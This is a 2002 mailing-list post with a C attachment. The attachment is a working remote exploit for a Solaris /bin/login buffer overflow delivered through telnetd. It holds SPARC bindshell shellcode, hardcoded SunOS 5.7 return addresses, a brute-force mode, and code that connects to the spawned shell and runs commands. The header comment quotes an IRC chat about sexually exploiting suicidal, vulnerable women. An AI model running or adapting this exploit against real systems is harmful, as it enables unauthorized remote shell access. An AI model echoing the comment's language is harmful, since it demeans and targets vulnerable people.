SOLARIS LOGIN remote via telnetd
Date: Thu, 14 Mar 2002 07:41:04 -0500
From: Morgan <[email protected]>
To: [email protected]
Subject: SOLARIS LOGIN remote via telnetd
Cc: [email protected]
--Boundary_(ID_54LyeLazkc1drFz5LNeQ7g)
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT
Here's something I threw together for the Solaris login/telnetd remote...
patches have been out for a few months now.
--Boundary_(ID_54LyeLazkc1drFz5LNeQ7g)
Content-type: application/octet-stream; name=login-ex.c
Content-transfer-encoding: quoted-printable
Content-disposition: attachment; filename=login-ex.c
/*=0A=
Solaris /bin/login array mismangement exploit by [email protected]=0A=
=0A=
compile: =0A=
use -DSOLARIS if your running it on a big endian system....=0A=
=0A=
friendly advice to find that special someone:=0A=
[ronin([email protected])] think if i make 'the lonely hearts club' at =
college...=0A=
[ronin([email protected])] it'll have a psych. effect on chicks?=0A=
[msg(ronin)] you'd get all the suicidal chicks=0A=
[ronin([email protected])] they have like clubs and shit... chess =
clubs, sport, rollerblading, etc.=0A=
[ronin([email protected])] u can make ur own=0A=
[msg(ronin)] yah.. most schools do=0A=
[ronin([email protected])] they should be the best in bed=0A=
[ronin([email protected])] cuz of how vulnerable they are to suggestion=0A=
[ronin([email protected])] and all that angst=0A=
[msg(ronin)] always thinking=0A=
[ronin([email protected])] can be harnessed for sexual gratification=0A=
[msg(ronin)] your a quite a sexual trickster =0A=
[ronin([email protected])] plus=0A=
[ronin([email protected])] suicidal =3D pain=0A=
[ronin([email protected])] pain =3D bdsm=0A=
[ronin([email protected])] happy go lucky chicks are too content in bed=0A=
[msg(ronin)] /me wanders off slowly=0A=
[ronin([email protected])] but suicidal chicks like to cover the full =
spectrum of pain=0A=
[ronin([email protected])] and pain and pleasure are one=0A=
=0A=
greets:=0A=
matthew, pioneering the pinkhat movement... ryan&drago, reading telnet =
rfcs for me..=0A=
ron1n, OMG! You're in school now!@#$! The metaray, level 6 on everquest =
now!=0A=
blueboar, for his exquisite mailing list..=0A=
antisec for being so darn hackerifically ethical... keep up the faith=0A=
and arcanum the aim sexual predator...=0A=
*/=0A=
=0A=
#include <stdio.h>=0A=
#include <unistd.h>=0A=
#include <sys/socket.h>=0A=
#include <sys/types.h>=0A=
#include <string.h>=0A=
#include <errno.h>=0A=
#include <netinet/in.h>=0A=
#include <netdb.h>=0A=
#include <arpa/inet.h>=0A=
#include <arpa/telnet.h>=0A=
=0A=
#define NOPS 8=0A=
=0A=
struct {=0A=
char *name;=0A=
unsigned long reta;=0A=
unsigned long retl;=0A=
}targets[] =3D {=0A=
{ "SunOS 5.7... local", 0xffbef85c, 0x20026fc8},=0A=
{ "SunOS 5.7... remote", 0xffbef8bc, 0x20026fc8},=0A=
{ "SunOS 5,7... remote 2", 0xffbef824, 0x20026fc8},=0A=
=0A=
{ NULL, 0, 0 }=0A=
};=0A=
=0A=
unsigned char shellcode[] =3D /* dopesquad.net shellcode + 8 nop =
bytes */=0A=
"\x10\x80\x00\x03" /* b foolabel */=0A=
"\x90\x1b\x80\x0e" /* xor %sp, %sp, %o0 */=0A=
/* OVERWRITE */ "\x82\x10\x20\x17" /* mov 23, %g1 */=0A=
=0A=
=0A=
=0A=
"\xa0\x23\xa0\x10" /* sub %sp, 16, %l0 */=0A=
"\xae\x23\x80\x10" /* sub %sp, %l0, %l7 */=0A=
"\xee\x23\xbf\xec" /* st %l7, [%sp - 20] */=0A=
"\x82\x05\xe0\xd6" /* add %l7, 214, %g1 */=0A=
"\x90\x25\xe0\x0e" /* sub %l7, 14, %o0 */=0A=
"\x92\x25\xe0\x0e" /* sub %l7, 14, %o1 */=0A=
"\x94\x1c\x40\x11" /* xor %l1, %l1, %o2 */=0A=
"\x96\x1c\x40\x11" /* xor %l1, %l1, %o3 */=0A=
"\x98\x25\xe0\x0f" /* sub %l7, 15, %o4 */=0A=
"\x91\xd0\x38\x08" /* ta 0x8 */=0A=
"\xa4\x1a\x80\x08" /* xor %o2, %o0, %l2 */=0A=
"\xd2\x33\xbf\xf0" /* sth %o1, [%sp - 16] */=0A=
"\xac\x10\x27\xd1" /* mov 2001, %l6 */=0A=
"\xec\x33\xbf\xf2" /* sth %l6, [%sp - 14] */=0A=
"\xc0\x23\xbf\xf4" /* st %g0, [%sp - 12] */=0A=
"\x82\x05\xe0\xd8" /* add %l7, 216, %g1 */=0A=
"\x90\x1a\xc0\x12" /* xor %o3, %l2, %o0 */=0A=
"\x92\x1a\xc0\x10" /* xor %o3, %l0, %o1 */=0A=
"\x94\x1a\xc0\x17" /* xor %o3, %l7, %o2 */=0A=
"\x91\xd0\x38\x08" /* ta 0x8 */=0A=
"\x82\x05\xe0\xd9" /* add %l7, 217, %g1 */=0A=
"\x90\x1a\xc0\x12" /* xor %o3, %l2, %o0 */=0A=
"\x92\x25\xe0\x0b" /* sub %l7, 11, %o1 */=0A=
"\x91\xd0\x38\x08" /* ta 0x8 */=0A=
"\x82\x05\xe0\xda" /* add %l7, 218, %g1 */=0A=
"\x90\x1a\xc0\x12" /* xor %o3, %l2, %o0 */=0A=
"\x92\x1a\xc0\x10" /* xor %o3, %l0, %o1 */=0A=
"\x94\x23\xa0\x14" /* sub %sp, 20, %o2 */=0A=
"\x91\xd0\x38\x08" /* ta 0x8 */=0A=
"\xa6\x1a\xc0\x08" /* xor %o3, %o0, %l3 */=0A=
"\x82\x05\xe0\x2e" /* add %l7, 46, %g1 */=0A=
"\x90\x1a\xc0\x13" /* xor %o3, %l3, %o0 */=0A=
"\x92\x25\xe0\x07" /* sub %l7, 7, %o1 */=0A=
"\x94\x1b\x80\x0e" /* xor %sp, %sp, %o2 */=0A=
"\x91\xd0\x38\x08" /* ta 0x8 */=0A=
"\x90\x1a\xc0\x13" /* xor %o3, %l3, %o0 */=0A=
"\x92\x25\xe0\x07" /* sub %l7, 7, %o1 */=0A=
"\x94\x02\xe0\x01" /* add %o3, 1, %o2 */=0A=
"\x91\xd0\x38\x08" /* ta 0x8 */=0A=
"\x90\x1a\xc0\x13" /* xor %o3, %l3, %o0 */=0A=
"\x92\x25\xe0\x07" /* sub %l7, 7, %o1 */=0A=
"\x94\x02\xe0\x02" /* add %o3, 2, %o2 */=0A=
"\x91\xd0\x38\x08" /* ta 0x8 */=0A=
"\x90\x1b\x80\x0e" /* xor %sp, %sp, %o0 */=0A=
"\x82\x02\xe0\x17" /* add %o3, 23, %g1 */=0A=
"\x91\xd0\x38\x08" /* ta 0x8 */=0A=
"\x21\x0b\xd8\x9a" /* sethi %hi(0x2f626800), %l0 */=0A=
"\xa0\x14\x21\x6e" /* or %l0, 0x16e, %l0 ! 0x2f62696e */=0A=
"\x23\x0b\xdc\xda" /* sethi %hi(0x2f736800), %l1 */=0A=
"\x90\x23\xa0\x10" /* sub %sp, 16, %o0 */=0A=
"\x92\x23\xa0\x08" /* sub %sp, 8, %o1 */=0A=
"\x94\x1b\x80\x0e" /* xor %sp, %sp, %o2 */=0A=
"\xe0\x3b\xbf\xf0" /* std %l0, [%sp - 16] */=0A=
"\xd0\x23\xbf\xf8" /* st %o0, [%sp - 8] */=0A=
"\xc0\x23\xbf\xfc" /* st %g0, [%sp - 4] */=0A=
"\x82\x02\xe0\x3b" /* add %o3, 59, %g1 */=0A=
"\x91\xd0\x38\x08" /* ta 0x8 */=0A=
"\x90\x1b\x80\x0e" /* xor %sp, %sp, %o0 */=0A=
"\x82\x02\xe0\x01" /* add %o3, 1, %g1 */=0A=
"\x91\xd0\x38\x08" /* ta 0x8 */=0A=
;=0A=
=0A=
=0A=
static char nop[]=3D"\x80\x1c\x40\x11";=0A=
=0A=
void usage(char **argv) {=0A=
int i;=0A=
=0A=
fprintf(stderr, "Solaris /bin/login array mismangement exploit =
by [email protected]\n");=0A=
fprintf(stderr, "usage: %s <host>\n", argv[0]);=0A=
fprintf(stderr, "\t-r <return address>\n");=0A=
fprintf(stderr, "\t-l <return location>\n");=0A=
fprintf(stderr, "\t-p <port>\n");=0A=
fprintf(stderr, "\t-t <target number>\n");=0A=
fprintf(stderr, "\t-e [for local /bin/login execution mode =
check for +s]\n");=0A=
fprintf(stderr, "\t%s -e <options> | /bin/login\n", argv[0]);=0A=
fprintf(stderr, "\t-b brute force mode\n\n");=0A=
fprintf(stderr, "targets are...\n");=0A=
for(i=3D0; targets[i].name; i++) =0A=
fprintf(stderr, "\t%d) %s\n", i, targets[i].name);=0A=
=0A=
fprintf(stderr, "\n");=0A=
exit(0);=0A=
=0A=
}=0A=
void die(char *error) { =0A=
fprintf(stderr, "Error: %s\n", error);=0A=
fprintf(stderr, "Program aborting..\n");=0A=
exit(0);=0A=
=0A=
}=0A=
=0A=
void shift(unsigned long *addr) {=0A=
unsigned long tmp;=0A=
tmp =3D *addr >> 24;=0A=
tmp +=3D *addr << 8 >> 24 << 8;=0A=
tmp +=3D *addr << 16 >> 24 << 16;=0A=
tmp +=3D *addr << 24;=0A=
*addr =3D tmp;=0A=
return;=0A=
} =0A=
=0A=
int write_with_iac(int fd, char *buff, int s)=0A=
{=0A=
int i;=0A=
unsigned char c=3D0, pt;=0A=
for (i=3D0; i<s; i++) {=0A=
c=3D(unsigned char)buff[i];=0A=
if (c=3D=3D0xff) if(write(fd, &c, 1) < 0)=0A=
die("Write failed sending IAC");=0A=
if(write(fd, &c, 1)<0)=0A=
die("Write failed sending user string");=0A=
}=0A=
}=0A=
=0A=
void send_ww(int fd, unsigned char arg, int a) {=0A=
char buf[3];=0A=
char *p=3Dbuf;=0A=
=0A=
*p++ =3D IAC;=0A=
if(a =3D=3D WILL)=0A=
*p++ =3D WILL;=0A=
else if(a =3D=3D WONT)=0A=
*p++ =3D WONT;=0A=
else {=0A=
fprintf(stderr, "illegal send, %d is not a valid send =
type\n", a);=0A=
exit(0);=0A=
}=0A=
*p =3D arg;=0A=
=0A=
write(fd, buf, 3);=0A=
=0A=
return;=0A=
}=0A=
=0A=
=0A=
int connect_shell(char *host, int port)=0A=
{=0A=
struct sockaddr_in s;=0A=
int sock;=0A=
struct hostent *h;=0A=
unsigned char c;=0A=
char commands[] =3D "cd /; echo; uname -a; id ;echo; "=0A=
"echo Mommy wow.. im a hacker now; echo ;\n\n";=0A=
char buf[2048];=0A=
fd_set fds;=0A=
int r;=0A=
=0A=
s.sin_family =3D AF_INET;=0A=
s.sin_port =3D htons(port);=0A=
s.sin_addr.s_addr =3D inet_addr(host);=0A=
=0A=
if ((h=3Dgethostbyname(host)) =3D=3D NULL)=0A=
{=0A=
fprintf(stderr, "cannot resolve: %s : %s\n", host, =
strerror(errno));=0A=
return -1;=0A=
}=0A=
memcpy (&s.sin_addr.s_addr, (struct in_addr *)h->h_addr, =
sizeof(h->h_addr));=0A=
=0A=
if ( (sock =3D socket (AF_INET, SOCK_STREAM, 0)) =3D=3D -1)=0A=
return sock;=0A=
=0A=
if (connect (sock, (struct sockaddr *)&s, sizeof(s)) =3D=3D -1)=0A=
{=0A=
close (sock);=0A=
return -1;=0A=
}=0A=
=0A=
write(sock, commands, strlen(commands));=0A=
=0A=
for(;;)=0A=
{ =0A=
FD_ZERO(&fds);=0A=
FD_SET(fileno(stdin), &fds);=0A=
FD_SET(sock, &fds);=0A=
select(255, &fds, NULL, NULL, NULL);=0A=
=0A=
if(FD_ISSET(sock, &fds))=0A=
{ =0A=
memset(buf, 0x0, sizeof(buf));=0A=
r =3D read (sock, buf, sizeof(buf) - 1);=0A=
if(r <=3D 0)=0A=
{ =0A=
fprintf(stderr, "Connection closed.\n");=0A=
exit(0);=0A=
}=0A=
fprintf(stderr, "%s", buf);=0A=
}=0A=
=0A=
if(FD_ISSET(fileno(stdin), &fds))=0A=
{ =0A=
memset(buf, 0x0, sizeof(buf));=0A=
read(fileno(stdin), buf, sizeof(buf) - 1);=0A=
write(sock, buf, strlen(buf));=0A=
}=0A=
}=0A=
return sock;=0A=
}=0A=
int do_telnet_negotation(char *host, int port)=0A=
{=0A=
struct sockaddr_in s;=0A=
int fd, ret;=0A=
u_char c, buf[3];=0A=
struct hostent *h;=0A=
=0A=
s.sin_family =3D AF_INET;=0A=
s.sin_port =3D htons(port);=0A=
s.sin_addr.s_addr =3D inet_addr(host);=0A=
=0A=
if ((h=3Dgethostbyname(host)) =3D=3D NULL)=0A=
{=0A=
fprintf(stderr, "cannot resolve: %s : %s\n", host, =
strerror(errno));=0A=
return -1;=0A=
}=0A=
=0A=
memcpy (&s.sin_addr.s_addr, (struct in_addr *)h->h_addr, =
sizeof(h->h_addr));=0A=
=0A=
if ( (fd =3D socket (AF_INET, SOCK_STREAM, 0)) =3D=3D -1)=0A=
return fd;=0A=
=0A=
if (connect (fd, (struct sockaddr *)&s, sizeof(s)) =3D=3D -1)=0A=
{=0A=
close (fd);=0A=
return -1;=0A=
}=0A=
=0A=
// send DONT's for all the DO's... ;)=0A=
send_ww(fd, TELOPT_TTYPE, WONT);=0A=
send_ww(fd, TELOPT_NAWS, WONT);=0A=
send_ww(fd, TELOPT_XDISPLOC, WONT);=0A=
send_ww(fd, TELOPT_NEW_ENVIRON, WONT);=0A=
send_ww(fd, TELOPT_OLD_ENVIRON, WONT);=0A=
send_ww(fd, TELOPT_BINARY, WILL);=0A=
=0A=
return fd;=0A=
}=0A=
=0A=
int setup_exploit(char *buffer, unsigned long retl, unsigned long reta, =
int bf) {=0A=
int i,j;=0A=
char *ptr;=0A=
char buf[3000]; =0A=
char blah[512];=0A=
unsigned long *a;=0A=
unsigned long strncpy_addr =3D 0xffbef2a8; =0A=
unsigned long chunk_size =3D 0xffffffd5;=0A=
unsigned long chunk =3D 0xfffffff0; =0A=
unsigned long free_addr =3D 0x20026eec;=0A=
#ifndef SOLARIS=0A=
shift(&strncpy_addr);=0A=
shift(&chunk_size);=0A=
shift(&chunk);=0A=
shift(&free_addr);=0A=
#endif =0A=
fprintf(stderr, "Solaris /bin/login array mismangement exploit by =
[email protected]\n");=0A=
fprintf(stderr, "<matthew> I've brought more terror to this network =
then Shdwknght to a chinese food buffet.\n\n");=0A=
if(!bf) {=0A=
fprintf(stderr, "using %#x as return address\n", reta);=0A=
fprintf(stderr, "using %#x as return location\n", retl);=0A=
}=0A=
else fprintf(stderr, "trying return address %#x\n", reta);=0A=
=0A=
memset(&buf[0], 0x41, 512);=0A=
// SETUP FIRST CHUNK=0A=
// size -44+1=0A=
ptr =3D &buf[36];=0A=
memcpy(ptr, &chunk_size, 4); =0A=
=0A=
// SETUP CHUNK numbah 2=0A=
retl -=3D 32;=0A=
reta -=3D 8;=0A=
#ifndef SOLARIS=0A=
shift(&retl);=0A=
shift(&reta);=0A=
#endif=0A=
ptr =3D buf;=0A=
=0A=
memcpy(ptr, &chunk, 4);=0A=
// second addr free'd =0A=
memcpy(ptr+4, &free_addr, 4);=0A=
memcpy(ptr+8, (void *)&retl, 4);=0A=
memset(ptr+16, 0xff, 4);=0A=
memcpy(ptr+32, (void *) &reta, 4);=0A=
=0A=
// fake chunk built.. setting up overflow..=0A=
for(i=3D0; i < 256; i++) {=0A=
if( i < 63 || i > 190) =0A=
blah[i] =3D 0x41;=0A=
else {=0A=
blah[i++] =3D 0x20;=0A=
blah[i] =3D 0x41;=0A=
}=0A=
}=0A=
=0A=
//free addr 1 send in addr of mem=0A=
memcpy(blah+252, &free_addr, 4);=0A=
=0A=
memcpy(blah+204, &strncpy_addr, 4);=0A=
=0A=
blah[256] =3D 0x00;=0A=
=0A=
=0A=
// add shellcode to end of buf=0A=
// pad with nops.. more is better... but not too many..=0A=
for(i=3D511-sizeof(shellcode)-2-4*NOPS; i < =
511-sizeof(shellcode); i+=3D4) =0A=
memcpy(&buf[i], nop, sizeof(nop)-1);=0A=
memcpy(&buf[511-sizeof(shellcode)-2], shellcode, =
sizeof(shellcode));=0A=
=0A=
=0A=
// convert nulls to space..=0A=
for(i=3D0,j=3D0;i<511;i++) {=0A=
if(buf[i] =3D=3D 0x00) {=0A=
buf[i] =3D 0x20; j++; }=0A=
}=0A=
buf[511] =3D 0x00;=0A=
=0A=
sprintf(buffer,"%s%s\n", &blah,&buf);=0A=
=0A=
return;=0A=
}=0A=
=0A=
int main(int argc, char **argv) {=0A=
int fd,fd2, c, type, port=3D23,local=3D0,bf=3D0, remp=3D2001;=0A=
char out[1024];=0A=
char in[24];=0A=
char ret[] =3D "\x0a";=0A=
char *host;=0A=
unsigned char bshell =3D 0xd5;=0A=
char cc;=0A=
unsigned long reta, retl;=0A=
=0A=
=0A=
FILE *login;=0A=
=0A=
retl =3D 0x20026fc8;=0A=
reta =3D 0xffbef864;=0A=
if(argc < 2)=0A=
usage(argv);=0A=
=0A=
while((c =3D getopt(argc, argv, "r:l:p:et:b")) !=3D EOF){=0A=
switch(c){ =0A=
case 'r':=0A=
reta =3D strtoul(optarg, NULL, 0);=0A=
break;=0A=
case 'l':=0A=
retl =3D strtoul(optarg, NULL, 0); =0A=
break;=0A=
case 'p':=0A=
port =3D atoi(optarg);=0A=
break;=0A=
case 'e':=0A=
local=3D1;=0A=
break;=0A=
case 't':=0A=
type =3D atoi(optarg);=0A=
if(type < 0 || type > 2){ =0A=
fprintf(stderr, "invalid target\n");=0A=
usage(argv);=0A=
exit(0);=0A=
}=0A=
if(strstr(targets[type].name, "local")) =0A=
local =3D 1;=0A=
retl =3D targets[type].retl;=0A=
reta =3D targets[type].reta;=0A=
break;=0A=
case 'b':=0A=
bf=3D1;=0A=
break;=0A=
}=0A=
}=0A=
=0A=
if(!local) {=0A=
if(!argv[optind] || !*argv[optind])=0A=
usage(argv);=0A=
=0A=
host =3D argv[optind];=0A=
}=0A=
=0A=
if(local) {=0A=
fprintf(stderr, "Local execution mode.. make sure to run =
%s [args] | /bin/login\n", argv[0]);=0A=
fprintf(stderr, "first wait for Password: prompt.. hit =
enter then,");=0A=
fprintf(stderr, "wait for Login incorrect, and attempt =
to connect to localhost on %d\n", remp);=0A=
=0A=
}=0A=
if(bf) {=0A=
reta =3D 0xffbef800;=0A=
} =0A=
=0A=
=0A=
for(;reta < 0xffbef8ff; reta+=3D4) {=0A=
memset(out, 0, sizeof(out));=0A=
setup_exploit(out, retl, reta, bf);=0A=
=0A=
if(local) {=0A=
if(bf) {=0A=
fprintf(stderr, "not supported do it manually you lazy fuck\n");=0A=
exit(0);=0A=
}=0A=
printf("%s", out);=0A=
}=0A=
else {=0A=
char *ptr=3Din;=0A=
fd =3D do_telnet_negotation (host, port);=0A=
=0A=
memset(in, 0, sizeof(in));=0A=
=0A=
while (!strstr(ptr, ":")) {=0A=
if(ptr=3D=3D&in[0]) {=0A=
memset(in, 0, sizeof(in));=0A=
if(read(fd, in, sizeof(in)-2) < 0)=0A=
die("Failed read waiting for login: ");=0A=
}=0A=
for(;ptr < &in[sizeof(in)-1] && ptr[0] !=3D 0; ptr++);=0A=
if( ptr=3D=3D&in[sizeof(in)-2] || (ptr[0]=3D=3D0 && ptr[1]=3D=3D0)) =0A=
ptr =3D &in[0];=0A=
else =0A=
ptr++;=0A=
=0A=
}=0A=
memset(in, 0, sizeof(in));=0A=
fprintf(stdout, "Read login, sending bad user string now\n");=0A=
write_with_iac(fd, out, strlen(out));=0A=
fprintf(stdout, "waiting for password... ");=0A=
=0A=
while (!strstr(ptr, ":")) {=0A=
if(ptr=3D=3D&in[0]) {=0A=
memset(in, 0, sizeof(in));=0A=
if(read(fd, in, sizeof(in)-2) < =
0)=0A=
die("Failed read waiting =
for password: ");=0A=
}=0A=
for(;ptr < &in[sizeof(in)-1] && ptr[0] =
!=3D 0; ptr++);=0A=
if( ptr=3D=3D&in[sizeof(in)-2] || =
(ptr[0]=3D=3D0 && ptr[1]=3D=3D0)) ptr =3D &in[0];=0A=
else ptr++;=0A=
} =0A=
memset(in, 0, sizeof(in));=0A=
fprintf(stdout, "read Password: \nsending enter =
now\n");=0A=
=0A=
if(write(fd, ret, strlen(ret)) < 0)=0A=
die("Write failed on password");=0A=
=0A=
fprintf(stdout, "Sent overflow string.... =
waiting for Login incorrect\n");=0A=
while (!strstr(ptr, "correct")) {=0A=
if(ptr=3D=3D&in[0]) {=0A=
memset(in, 0, sizeof(in));=0A=
if(read(fd, in, sizeof(in)-2) < =
0)=0A=
die("Failed read waiting =
for Login Incorrect ");=0A=
}=0A=
for(;ptr < &in[sizeof(in)-1] && ptr[0] =
!=3D 0; ptr++);=0A=
if( ptr=3D=3D&in[sizeof(in)-2] || =
(ptr[0]=3D=3D0 && ptr[1]=3D=3D0))=0A=
ptr =3D &in[0];=0A=
else=0A=
ptr++;=0A=
=0A=
} =0A=
fprintf(stdout, "Got it!\n");=0A=
fprintf(stdout, "lets connect to our =
bindshell..\n");=0A=
=0A=
close(connect_shell(host, remp));=0A=
=0A=
close(fd);=0A=
}=0A=
if(!bf) return;=0A=
}=0A=
fprintf(stderr, "connection closed.\n");=0A=
=0A=
return;=0A=
}=0A=
--Boundary_(ID_54LyeLazkc1drFz5LNeQ7g)--
